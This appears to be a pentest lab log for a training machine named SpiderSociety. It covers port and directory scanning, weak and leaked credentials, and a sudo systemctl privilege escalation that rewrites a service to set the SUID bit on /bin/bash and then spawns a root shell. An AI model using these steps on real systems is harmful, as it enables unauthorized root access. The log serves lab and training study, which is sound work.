🧪 Pentest Log: {{date:2025-08-18}}

🔍 Target Information

• Machine Name: SpiderSociety
• IP Address: 192.168.199.214
• Operating System: Linux

ip=192.168.199.214

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://offsec.lab -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt

Found /libspider, use weak credential

admin:admin

Obtain ftp credential

ss_ftpbckuser:ss_WeLoveSpiderSociety_From_Tech_Dept5937!

Port 2121

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 2121
• Vulnerability Type: Credential Leak

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

Found hidden file

.fuhfjkzbdsfuybefzmdbbzdcbhjzdbcukbdvbsdvuibdvnbdvenv

Obtain spidey password

spidey:WithGreatPowerComesGreatSecurity99!

🧬 Privilege Escalation

👤 Current Access

• User: spidey
• Groups: 1001(spidey)
• Shell Type: reverse shell

🔍 Enumeration

Sudo

sudo -l

Found

User spidey may run the following commands on spidersociety:
    (ALL) NOPASSWD: /bin/systemctl restart spiderbackup.service
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) !/bin/bash, !/bin/sh, !/bin/su, !/usr/bin/sudo

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Sudo Abuse
• Target Binary/Service: systemctl
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

systemctl cat spiderbackup.service
ls -al /etc/systemd/system/spiderbackup.service

vi /etc/systemd/system/spiderbackup.service

ExecStart=/home/spidey/exploit.sh

vi /home/spidey/exploit.sh

#!/bin/bash
chmod +s /bin/bash


chmod +x exploit.sh

• Smash to root

sudo /bin/systemctl daemon-reload
sudo /bin/systemctl restart spiderbackup.service
bash -p